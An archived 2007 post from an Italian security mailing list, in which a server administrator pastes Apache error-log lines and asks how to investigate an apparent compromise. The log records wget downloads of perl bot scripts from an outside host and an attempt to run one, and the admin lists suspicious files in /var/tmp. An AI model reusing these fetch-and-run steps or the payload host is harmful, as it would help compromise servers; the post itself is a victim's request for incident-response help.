[ Home | Liste | F.A.Q. | Risorse | Cerca... ]


[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]


Archivio: Maggio 2007 ml@sikurezza.org
Soggetto: [ml] strane righe in error.log di apache
Mittente: Roberto Bottoni - AfterBit
Data: Mon, 14 May 2007 13:42:18 +0200 (CEST)
Nel file var/log/apache2/error.log di apache 2 trovo delle righe del tipo :

--01:45:48--  http://www.eodspr.kit.net/vna.txt
          => `vna.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
01:45:49 ERROR 404: Not Found.

Can't open perl script "vna.txt": No such file or directory
perl: no process killed
--01:50:24--  http://www.eodspr.kit.net/botefnet.txt
          => `botefnet.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,836 [text/plain]

0K .......... .......... 100% 31.18 KB/s

01:50:26 (31.18 KB/s) - `botefnet.txt' saved [20836/20836]

--02:23:57--  http://www.eodspr.kit.net/botnet.txt
          => `botnet.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,856 [text/plain]

0K .......... .......... 100% 29.98 KB/s

02:23:59 (29.98 KB/s) - `botnet.txt' saved [20856/20856]


inoltre nella cartella /var/tmp ci sono dei file sospetti che non credo c'entrino nulla col sistema.. tipo :
port.tgz
httpd
seclogstate.state


ed altri..

immagino che ci siamo dei "problemi".. ma adesso cosa posso iniziare a fare per capire che cosa sta succedendo???
ho provato chrootkit.. e non mi ha dato nessun "pericolo"


grazie!
Roberto






[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005